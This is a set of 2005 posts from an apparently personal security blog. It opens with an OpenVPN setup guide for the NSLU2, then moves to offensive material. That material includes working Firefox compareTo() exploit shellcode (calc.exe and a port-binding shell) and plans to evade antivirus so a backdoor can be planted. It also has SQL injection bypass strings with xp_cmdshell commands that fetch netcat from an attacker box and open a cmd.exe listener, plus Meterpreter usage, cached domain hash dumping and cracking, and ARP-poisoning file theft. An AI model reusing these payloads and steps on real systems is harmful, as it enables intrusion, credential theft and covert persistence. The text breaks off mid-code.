Sunday, December 18, 2005

OpenVPN on NSLU2

Well, I finally picked up an NSLU2 by Linksys. I have to say I am pretty impressed so far. A little device that fits in my hand just replaced two of my boxes at home: one for my fileserver and one for my OpenVPN server. Maybe at a later date I will write up how to flash it with Unslung, but it is pretty easy, so this doc is just for me to remember how I set up my OpenVPN.


First things first: go buy the NSLU2, then download Unslung and flash it.
http://www.nslu2-linux.org/

Now that you have it flashed, I put on a few packages first so I could work with it a bit better:
OpenSSH
Vim
Bash
Grep

OK, now we are ready.
SSH to your NSLU2. If you have not set your password yet, the default password is "uNSLUng".

Install OpenVPN:
ipkg update; ipkg -force-depends install openvpn

Create the tun device node:
mkdir /dev/net
mknod /dev/net/tun c 10 200

Load the tun module:
insmod tun

Enable routing (this does not survive a reboot; the startup script below sets it again):
echo 1 > /proc/sys/net/ipv4/ip_forward

Now it's time to generate our certs. I just downloaded OpenVPN on to my machine to create them; it goes much faster that way than on the NSLU2.
You can download the current OpenVPN version here:
http://openvpn.net/
More details on this process can be found here:
http://openvpn.net/howto.html#pki

cd into the easy-rsa directory and edit the vars file with your information, then:

. ./vars
./clean-all
./build-ca

Now that the CA is up, we can build the key and certificate for the server.

./build-key-server server

Now we have to build our client certs. I will only be building it for one client. I also use password-protected client keys:

./build-key-pass client1

Note: if you want other clients, repeat the step with client2 (or whatever you like). Always use a unique common name for each client; by default the server will not let two clients with the same common name connect at once unless you set duplicate-cn.

Generate Diffie-Hellman parameters:
./build-dh

Now we need to create a directory on the NSLU2 to copy our keys to:
mkdir -p /opt/etc/openvpn/keys

Copy the files the server actually needs to the NSLU2 (file names may differ for you):
ca.crt, dh1024.pem, server.crt and server.key
Leave ca.key on the machine you generate certificates on: the server never reads it, and whoever holds it can issue client certs your VPN will trust. The numbered 01.pem, 02.pem, ... files in keys/ are just easy-rsa's copies of the certs it has issued and are not needed on the server either.

Now let's create a server.conf on the NSLU2 and write our conf file.
You can get a sample conf file from the OpenVPN download (sample-config-files/server.conf). I will just touch on the main things I change below.

I use TCP so I can get through a proxy (OpenVPN's http-proxy option needs a TCP tunnel). If you do not need that, UDP is the better choice, since a TCP tunnel carrying TCP traffic performs badly on lossy links:
# TCP or UDP server?
proto tcp
;proto udp


Choose a cipher; the client must use the same one. Of the three in the sample, AES-128-CBC is the one to take, since Blowfish and Triple-DES have a 64-bit block size.
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES



Make sure it drops privileges to nobody. Since the process can then no longer re-read the key files or reopen the tun device, also add persist-key and persist-tun to server.conf so a SIGUSR1 restart (for example from ping-restart) does not fail.
# You can uncomment this out on
# non-Windows systems.
user nobody
group nobody


That's pretty much it for the server side.

The client side is pretty much straightforward. Just make sure the client config points at the right certs:
ca.crt
client1.crt
client1.key


Now back to the NSLU2.

For a while I had been trying to get MASQUERADE in iptables to work, but since the module is not in the ipkg repository and it is not enabled in the kernel, this was not working. If you view the comment below, Cooper did get this working and wrote a how-to for it. Since he wanted MASQUERADE for something a bit different, I will document how I did it. I wanted it so I can reach other boxes behind the VPN without having to create SSH tunnels (which is what I was doing).
Here is Cooper's doc on the NSLU2 site:

http://www.nslu2-linux.org/wiki/HowTo/EnableIPMasquerading

Now, for what I did for MASQUERADE.

First, I installed the MASQUERADE modules. I used pre-compiled ones since I'm lazy; you can compile them yourself if you like, and Cooper's doc shows you how. Below is a link to pre-compiled ones:

http://www.defector.de/docs/nslu2-ipmasq.htm

Now you can install these:

ipkg-cl install kernel-module-ipt-masquerade_2.4.22.l2.3r63-r7_nslu2.ipk
ipkg-cl install kernel-module-ipt-state_2.4.22.l2.3r63-r7_nslu2.ipk


Now let's load the modules:

insmod ip_tables
insmod iptable_filter
insmod ip_conntrack
insmod iptable_nat
insmod ipt_state
insmod ipt_MASQUERADE


If some modules cannot be found, I may have forgotten to document them when I was messing around with different modules. You can easily find and install them. I actually don't think you even need ipt_state or iptable_filter, but I put them in there anyway to have a more complete iptables (in case of future work).

example:
ipkg list |grep conntrack

Now let's get all this stuff to run on reboot.


Create /opt/etc/init.d/S24openvpn (Unslung runs the scripts in /opt/etc/init.d in order at boot) and make it executable with chmod +x.

###################################################
#!/bin/sh

# Restart cleanly if an instance is already running.
if [ -n "`pidof openvpn`" ]; then
    /bin/killall openvpn 2>/dev/null
fi

# Load kernel modules (a "module already loaded" error here is harmless).
/sbin/insmod tun
/sbin/insmod ip_tables
/sbin/insmod iptable_filter
/sbin/insmod ip_conntrack
/sbin/insmod iptable_nat
/sbin/insmod ipt_state
/sbin/insmod ipt_MASQUERADE

# Enable IP forwarding (not persistent, so it is redone on every boot).
echo 1 > /proc/sys/net/ipv4/ip_forward

# NAT the VPN client subnet out of the NSLU2's Ethernet interface (ixp0).
# 10.8.0.0/24 must match the "server" line in server.conf.
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o ixp0 -j MASQUERADE

# Start the VPN server in daemon mode.
/opt/sbin/openvpn --cd /opt/etc/openvpn --daemon \
    --log-append /var/log/openvpn.log \
    --config server.conf
###################################################


Now you are all set! Test it out!

Thanks to everyone!

Thursday, December 15, 2005

Fun w/ FireFox compareTo() Remote Execution

I love firefox, but just could not resist this.

A vulnerability was found in Mozilla Firefox <= 1.04 when using the compareTo() function.
http://www.milw0rm.com/id.php?id=1369

You can find older versions of FireFox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/

The exploit payload contained just a return (it would only close the browser).
And what fun is that?

// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");

So I thought, let's actually execute some arbitrary code.

The thing that makes it hard is we cannot just use normal shellcode. We have to convert it to UTF-16 so the browser can execute it: each %uXXXX in the string is one 16-bit code unit that unescape() stores little-endian, so two consecutive shellcode bytes b0 b1 become %u<b1><b0> (pad an odd trailing byte with a NOP). I suppose UTF-8 would work also.

For example, encoding the four characters of the text \x29 (ASCII 0x5c 0x78 0x32 0x39) gives:

\x29 would be %u785c%u3932

and the two raw bytes 0x29 0xc3 would become %uc329.

So here we go: create the shellcode and encode it to UTF-16.
How about something simple like calc.exe?

I found a shellcode encoder. I have had mixed results with it, but you can find it here:
http://www.milw0rm.com/id.php?id=656
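As an added example (not the milw0rm encoder linked above and not part of the original post), here is the byte-to-%u packing rule in Python, with a decoder so a payload copied from somewhere can be checked before it is run. The 0x90 used to pad an odd-length payload is an assumption (an x86 NOP); the sample inputs are the post's own "just return" payload and the \x29 text example.

```python
import re


def to_unicode_escapes(code: bytes, pad: int = 0x90) -> str:
    """Pack raw shellcode into the %uXXXX form that JavaScript's unescape()
    turns back into the same bytes in memory.

    unescape("%uXXXX") yields one 16-bit code unit, which the browser stores
    little-endian, so the byte pair (b0, b1) has to be written as %u<b1><b0>.
    An odd trailing byte is padded with `pad` (0x90, an x86 NOP, assumed here).
    """
    if len(code) % 2:
        code += bytes([pad])
    return "".join(f"%u{code[i + 1]:02x}{code[i]:02x}" for i in range(0, len(code), 2))


def from_unicode_escapes(s: str) -> bytes:
    """Inverse: recover the bytes a %uXXXX string lays out in memory."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", s):
        value = int(unit, 16)
        out += bytes([value & 0xFF, value >> 8])
    return bytes(out)


def js_payload_line(code: bytes, var: str = "payLoadCode") -> str:
    """Render the line that goes into the exploit page."""
    return f'var {var}=unescape("{to_unicode_escapes(code)}");'


if __name__ == "__main__":
    # Constructed inputs: the post's "just return" payload and the text example.
    nop_ret = b"\x90\x90\xc3\x90"
    print(js_payload_line(nop_ret))              # var payLoadCode=unescape("%u9090%u90c3");
    print(to_unicode_escapes(b"\\x29"))          # %u785c%u3932: the four characters of \x29
    print(from_unicode_escapes("%u9090%u90C3"))  # b'\x90\x90\xc3\x90'
```

Running the decoder over a pasted payload and disassembling the result is the quickest way to see whether a "mixed result" is the encoder's fault or the shellcode's.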

// Payload - Calc.exe
var payLoadCode=unescape(
"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7"+
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

Loaded the page, Firefox shut down and calc.exe popped up. We can execute!
(tested on WinXP SP2)

While calc.exe was funny, it is not too useful.

Let's bind a port so we can get a shell.

I tried creating different shellcode, things such as adding a user, port binding, cmd exec, and reverse shells, in both Linux and Windows. The shellcode was very touchy and had mixed results after encoding to UTF-16.

This Win32 bind shellcode from SkyLined did work on WinXP SP2.

// Payload - Win32 bindshell (port 28876) - SkyLined
var payLoadCode=unescape("%u4343%u4343%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

Opened the page in Firefox and telnetted to port 28876.

Symantec did see it as a Trojan about one minute later, though.

I will look into changing the shellcode a bit in the hope of not triggering Symantec.
Otherwise you would only have one minute after the exploit to plant a backdoor.

The exploit uses SkyLined's heap spraying technique: the heap is filled with many copies of a NOP slide followed by the shellcode, so that the address the exploit jumps to is almost certain to land inside one of the copies and slide into the payload. It's actually a pretty cool method for getting a predictable address.

I will continue to work on this when time permits. If anyone is interested, I would like to see other UTF-16 encoded shellcode that works.

Here is a UTF-16 payload by SkyLined that is not supposed to set off virus scanners.
I have not tested this one yet.

// Note: as reproduced here, the hex is identical to the bindshell payload above.
payLoadCode = unescape("%u4343"+"%u4343"+"%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

Below are some links to more info.

http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php

Tuesday, November 29, 2005

SQL Injection Cheat Sheet

A small reference for testing and using SQL injection.

Note: this is for my reference, so if there is not enough detail I apologize.


Testing for SQL Injection Vulnerabilities:

We want to see if the input is sanitized or checked. Below is something you can insert into the form to check:

ba' or 1=1--

Example:
User: ba' or 1=1--
Pass: ba' or 1=1--

Query Manipulation:

SELECT * FROM table WHERE user='ba'

-TO-

SELECT * FROM table WHERE user='ba' or 1=1--

Other examples (depending on how the query was written, here are other options to try):

' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
" or "1"="1
') or ('1'='1



Note: ( -- ) starts a comment, so the server ignores the rest of the query; that is what keeps your single quotes ( ' ) balanced. It works on MS SQL, Oracle and PostgreSQL; MySQL needs a space after it ( -- ) or you can use ( # ) instead. Also, if the field is hidden, you can save the form locally and submit it from your own box with the injection in it.
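To see the query manipulation above actually happen, here is an added Python example (not from the original cheat sheet) that builds the same login query against an in-memory SQLite table, first by pasting the input into the SQL text and then with a parameterized query. The table, the account and its password are constructed for the demo; SQLite treats -- as a comment the way MS SQL does, so the bypass behaves as described.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed demo table with a single account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return con


def build_vulnerable_query(user: str, pw: str) -> str:
    """The classic mistake: user input pasted straight into the SQL text."""
    return f"SELECT * FROM users WHERE user='{user}' AND pass='{pw}'"


def login_vulnerable(con: sqlite3.Connection, user: str, pw: str) -> bool:
    """Login check built by concatenation; ba' or 1=1-- turns the WHERE
    clause into user='ba' or 1=1 and comments out the password test."""
    return con.execute(build_vulnerable_query(user, pw)).fetchone() is not None


def login_parameterized(con: sqlite3.Connection, user: str, pw: str) -> bool:
    """Same check with bound parameters: the input can never change the
    statement's structure, only the values being compared."""
    row = con.execute(
        "SELECT * FROM users WHERE user=? AND pass=?", (user, pw)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    probe = "ba' or 1=1--"
    print(build_vulnerable_query(probe, probe))
    print("vulnerable:    ", login_vulnerable(con, probe, probe))      # True, no password needed
    print("parameterized: ", login_parameterized(con, probe, probe))  # False
    print("quote variant: ", login_vulnerable(con, "' or '1'='1", "' or '1'='1"))  # True
```

The ') or ('1'='1 variant from the list is not tried here because it only parses when the original query wrapped its conditions in parentheses, which is exactly the "depending on how the query was written" point above.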


Remote Execution on MS SQL:

Now we know the server is vulnerable. While nice, the above does not always let us bypass the login screen, or we may just want to do something different. Here is an option.

Start a sniffer on a box you own (mybox.com below; the name you look up has to actually resolve through that box, for example because it is authoritative for mybox.com):

# tcpdump -n udp and port 53 and host victimhostname

If the victim goes through a recursive resolver, the query arrives from the resolver's address rather than the victim's, so drop the host filter in that case.

Now make the victim do a DNS query against your box (nslookup <name> <server> would send the query straight to mybox.com instead of through the victim's resolver):

'; EXEC master..xp_cmdshell 'nslookup mybox.com' --

You will see the DNS query in your tcpdump output, which means the EXEC worked! Now you can do whatever you like. For demonstration purposes, let's just upload netcat and execute it:

'; EXEC master..xp_cmdshell 'tftp -i mybox.com GET nc.exe c:\nc.exe' --

Now execute netcat so it's listening:

'; EXEC master..xp_cmdshell 'c:\nc.exe -l -p 9999 -e cmd.exe' --

Now if you know what to do the box is all yours!

Note: the ( ; ) ends the previous query and starts the next one (MS SQL accepts stacked queries like this). xp_cmdshell runs commands as the SQL Server service account and needs the application's login to be sysadmin (or to have been granted it); on SQL Server 2005 it is disabled by default. Also, if the ( ' ) is not working, try a ( " ).


Conclusion: this is very basic SQL injection. Since it is just a cheat sheet I did not want it to become too long. Later I will cover other topics such as information gathering from ODBC error messages, column enumeration, querying specific things, and blind SQL injection.

Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Monday, November 7, 2005

Web Attacking Through Google

An attacker may be able to do web-based attacks through Google. The goal would be to have Google process the malicious request against the target.

I first tested it with the add-content section of the personalized Google page, which, it seems, does at least need some type of RSS content to process.

For example, here is a very, very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant

At first I was thinking you could add this to "add content" on the personal page. It didn't seem to work; like I said earlier, it does want some type of RSS content.

So I then tried something like this in "add content":
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant

Still no go.

So then I thought of Google caching.
Basically you set up a static HTML page on some free web hosting company; the page would have all of the attack links (directory traversals, SQL injections, PHP exploits, etc.).

Wait for Google to cache it.
Viewing the page through Google's cache, the attacker could then launch all of the attacks from Google.
This would all be done with a point and click.

Not really that dangerous, since if you really wanted to find the attacker, Google could provide you with logs. But it would be from an anonymous web site and would be two more steps (you could even proxy the registration of the site).

It would look weird for the person watching the IDS (Google attacking??); some may not even think anything of it, thinking it's just the Googlebot. Also, it would be hard for the target to block you, considering most places do not want to block Google.

This just kind of follows up Johnny Long's idea of zero-packet attacks:
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf

Thursday, November 3, 2005

Post-Exploitation w/ Meterpreter

Since I seem to forget how to use Meterpreter every time, I figured I would just document some basic functions of it.

More information can be found at http://www.metasploit.org

After the box is exploited and you have Meterpreter as the payload, you can begin to use it.

There are many extensions that can be used; different extensions provide different functions.

1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.

Here is how you load them:
use -m Process
loadlib: Loading library from 'ext950591.dll' on the remote machine.

There is a lot you can do, but I'm just going to show what I use the most.
Below will get you a cmd prompt on the machine (assuming it's Windows).

meterpreter> execute -f cmd -c
execute: Executing 'cmd'...

execute: success, process id is 3516.
execute: allocated channel 1 for new process.

You now have to interact with the assigned channel. Then you've got cmd!

meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y

With the Fs extension you can download and upload files.

meterpreter> use -m Fs
meterpreter> download file location

And that's pretty much what I use the most. Maybe later I will write an advanced section.

Friday, October 28, 2005

Grabbing and Cracking Cached Domain Hashes (mscash) w/ John

This is something I wrote up a while back. Not that great, but I wanted to document it before I lost it.

---


Background: it's great gaining local admin on a Windows box, but then you are limited to that box.
It's much more useful getting a domain user or even a Domain or Enterprise Admin!
Assuming you are on a domain: most Windows domains have password caching turned on (the default keeps the last 10 logons),
which means any time a domain user logs into the box, a hash of the credentials is cached in the registry, readable with SYSTEM rights.
Now let's see how we can grab this and crack it.

Note: I only did this in Linux; I have no idea if it works in Windows.
Also, I will not go into much technical detail on the caching. Google if you want to learn more;
the info is out there.

Tools:
1. John The Ripper (1.6.37) - http://www.openwall.com/john/ (you will need the src; we will patch it)
2. cachedump - http://www.off-by-one.net/misc/cachedump.html
3. John The Ripper patch - http://www.banquise.net/misc/patch-john.html (get "the big patch")

Steps:
1. Compile and patch John (the john dir and the patch must be in the same dir)
- tar xfz john-1.6.37.tar.gz
- gunzip -c john-1.6.37-bigpatch-13.diff.gz | patch -p0 (you should see it patching files)
- cd john-1.6.37/src/
- make (with no target it only lists the build targets; run it again with the one for your platform, e.g. make linux-x86-any)

Note: now you have John patched, and it can accept many more hash types, such as mscash. Another favorite
of mine is Lotus Notes; it's pretty easy to get anyone's Notes hash without even being a user.
I'll save that for a different doc; we'll stick with mscash.

2. Get the cached passwords from the Windows box (you must be local admin)
- cmd.exe
- cachedump.exe -v (it first installs a service to get SYSTEM rights)
- The output should look like the following:

CacheDump service successfully installed.
Service started.
user1:5E9092870891234FEF30940952359045633456:domain:
domainadmin:D938458093490BF9035649095CC334:domain:
user2:8982390FAB93099EF30940945745:domain:
Service successfully removed.

- Copy and paste the hashes into a txt file for john.

3. Now we get to crack it. Your choice of brute force or dictionary.
- ./john -format:mscash ./mshashs.txt


Note: now you just have to wait, depending on how good the password is.
And that's it. Have fun.
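As an added example (not part of the original write-up, and not cachedump's or John's code), here is what John is actually cracking in the mscash format: the cached credential is MD4 over the NT hash of the password followed by the lower-cased username in UTF-16LE. The block computes it in Python and runs a small dictionary check over cachedump-style user:hash:domain: lines. MD4 is implemented inline because hashlib's md4 is missing from many modern OpenSSL builds; the dump lines and the wordlist are constructed for the demo.

```python
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (inline because hashlib's md4 is often unavailable)."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return ((x & y) | (~x & z)) & MASK32
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h3(x, y, z): return x ^ y ^ z

    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h3, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, k in rounds:
            for n, i in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[i] + k) & MASK32, shifts[n % 4])
                a, b, c, d = d, a, b, c
        h = [(p + q) & MASK32 for p, q in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def mscash(username: str, password: str) -> bytes:
    """Cached domain credential (John's 'mscash' format): MD4 over the NT hash
    followed by the lower-cased username in UTF-16LE. The only salt is the
    username, so one wordlist pass covers every domain with that user name."""
    return md4(nt_hash(password) + username.lower().encode("utf-16-le"))


def parse_cachedump(text: str) -> list:
    """Parse cachedump's user:hash:domain: lines into (user, hash, domain)."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 3 and len(parts[1]) == 32:
            entries.append((parts[0], parts[1].lower(), parts[2]))
    return entries


def crack(entries: list, wordlist: list) -> dict:
    """Dictionary attack: returns {user: password} for every entry that fell."""
    found = {}
    for user, digest, _domain in entries:
        for word in wordlist:
            if mscash(user, word).hex() == digest:
                found[user] = word
                break
    return found


if __name__ == "__main__":
    # Constructed cachedump-style output; the hashes are computed here, not captured.
    dump = "\n".join(
        f"{u}:{mscash(u, p).hex()}:CORP:"
        for u, p in [("user1", "Winter2005"), ("domainadmin", "P@ssw0rd")]
    )
    print(dump)
    print(crack(parse_cachedump(dump), ["password", "Winter2005", "letmein", "P@ssw0rd"]))
```

The cachedump lines quoted above are not real hashes (they are not 32 hex digits), so the parser skips lines like them; real output has exactly 32.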


References:
http://www.off-by-one.net/misc/cachedump.html
http://www.banquise.net/misc/patch-john.html

All Your File Are Belong To Us

Been testing a neat little app called tcpxtract.
http://tcpxtract.sourceforge.net/

What it does is grab files from sniffed traffic through "carving". It can be used against live sniffing or against a pcap file.

Findings so far:

First, I thought I would run it against a kismet pcap file I had lying around.
It turned up a couple of images; must have been people browsing the web.
I would assume other files would work no problem, since wireless is not a switched network and anyone can see all the traffic.

1. FILES OWNED

Second, I thought I would fire up Ethereal http://www.ethereal.com/ and bind it to my local Ethernet card to sniff.
I did a few file transfers during the sniff: SCP, FTP, Windows SMB share (AD Kerberos).
Saved the sniff in a pcap file and ran tcpxtract against it.

- SCP: I obviously did not grab the file I transferred.
- FTP: Do I even have to tell?
- SMB: Yep, grabbed that file too.

2. FILES OWNED

Third, I was thinking this isn't that useful. Why do I want to see my own files transferred? And on a wireless network, for anyone to transfer anything useful is just plain stupid.

So, I got to thinking: how about a "man in the middle" attack? I fire up the handy ettercap http://ettercap.sourceforge.net/
and poison the ARP cache on the switch, route all traffic to my local Ethernet card and then route the packets on to their final destination.

Now, since all the switch traffic is running through my Ethernet device, I bind tcpxtract to my local Ethernet device. And the files started to pour in (mpg, mp3, doc, pdf, etc.), a lot of them.

3. FILES OWNED

Now, I'm sure people see the danger here. For security testers/auditors it's a way to rid your company of FTP and other non-secure protocols: do that attack against some highly sensitive servers, and then show your manager all the nice sensitive documents you mined!

I will be looking into other methods of using tcpxtract.

Tuesday, October 18, 2005

Snort Back Orifice Preprocessor Buffer Overflow

While looking into US-CERT TA05-291A, this is what I found.

While Snort does review the traffic on port 31337, the preprocessor also looks at any UDP traffic that carries Back Orifice's magic cookie.

* spp_bo.c comments
*
* Purpose: Detects Back Orifice traffic by brute forcing the weak encryption
* of the program's network protocol and detects the magic cookie
* that it's servers and clients require to communicate with each
* other.
*
* Back Orifice magic cookie is "*!*QWTY?", which is located in the first
* eight bytes of the packet. But it is encrypted using an XOR.

When exploiting this we want this function of the preprocessor to kick off, and since it keys on the magic cookie rather than the port, the UDP packet can use any port; it does not need to be 31337.

Below is where the fun happens.

//snippet from spp_bo.c
static int BoGetDirection(Packet *p, char *pkt_data)
{
    u_int32_t len = 0;
    u_int32_t id = 0;
    u_int32_t l, i;
    char type;
    char buf1[1024]; /* Interesting ??? A static array? Is this checked? hehe */
    char buf2[1024]; /* Interesting ??? A static array? Is this checked? hehe */
    char *buf_ptr;
    char plaintext;
//snippet from spp_bo.c

I don't see any checks: nothing compares len against the 1024-byte buffers before the loop below copies len bytes into them.

//snippet from spp_bo.c
    /* Only examine data if this a ping request or response */
    if ( type == BO_TYPE_PING )
    {
        i = 0;
        buf_ptr = buf1;
        *buf1 = 0;
        *buf2 = 0;
        /* Decrypt data */
        while ( i < len )
        {
            plaintext = (char) (*pkt_data ^ (BoRand()%256));
            *buf_ptr = plaintext;
            i++;
            pkt_data++;
            buf_ptr++;
            if ( plaintext == 0 )
                buf_ptr = buf2;
        }

        /* null-terminate string */
        *buf_ptr = 0;

        DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf1 = %s\n", buf1););

        if ( *buf2 != 0 )
        {
            DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf2 = %s\n",buf2););
        }

        DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "crc = 0x%x\n", (char)
                   (*pkt_data ^ (BoRand()%256))););

        if ( len > 4 && !strncasecmp((buf1+3), "PONG", 4) )
        {
            return BO_FROM_SERVER;
        }
        else
        {
            return BO_FROM_CLIENT;
        }
    }
//snippet from spp_bo.c
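To make the missing check concrete, here is an added Python model (not Snort's code) of the decrypt loop above. buf1, buf2 and a four-byte sentinel standing in for whatever sits above them in the real stack frame are laid out as one contiguous region (an assumption about layout), the keystream is a constructed stand-in for BoRand()%256, and len is passed in by the caller the way the C code takes it from the packet. The bounded variant shows the checks the loop needs.

```python
BUF_SIZE = 1024        # char buf1[1024]; char buf2[1024];
SENTINEL = b"RET!"     # stands in for whatever sits above the buffers in the frame


def constant_keystream(k: int):
    """Constructed stand-in for BoRand()%256: every keystream byte is k."""
    while True:
        yield k


def decrypt_unbounded(pkt_data: bytes, length: int, keystream) -> bool:
    """Model of the loop in BoGetDirection(): write `length` decrypted bytes
    into buf1, jumping to the start of buf2 at the first NUL, with no bounds
    check. buf1, buf2 and the sentinel are modelled as one contiguous region
    (assumed layout). Returns True if the sentinel was clobbered."""
    frame = bytearray(2 * BUF_SIZE) + bytearray(SENTINEL)
    buf1, buf2 = 0, BUF_SIZE
    ptr = buf1
    for i in range(length):
        if ptr >= len(frame):
            break  # C would keep writing past the frame; the process dies instead
        byte = pkt_data[i] if i < len(pkt_data) else 0  # C would also read past the packet
        plaintext = byte ^ next(keystream)
        frame[ptr] = plaintext
        ptr += 1
        if plaintext == 0:
            ptr = buf2
    if ptr < len(frame):
        frame[ptr] = 0  # the "null-terminate string" write after the loop
    return bytes(frame[2 * BUF_SIZE:]) != SENTINEL


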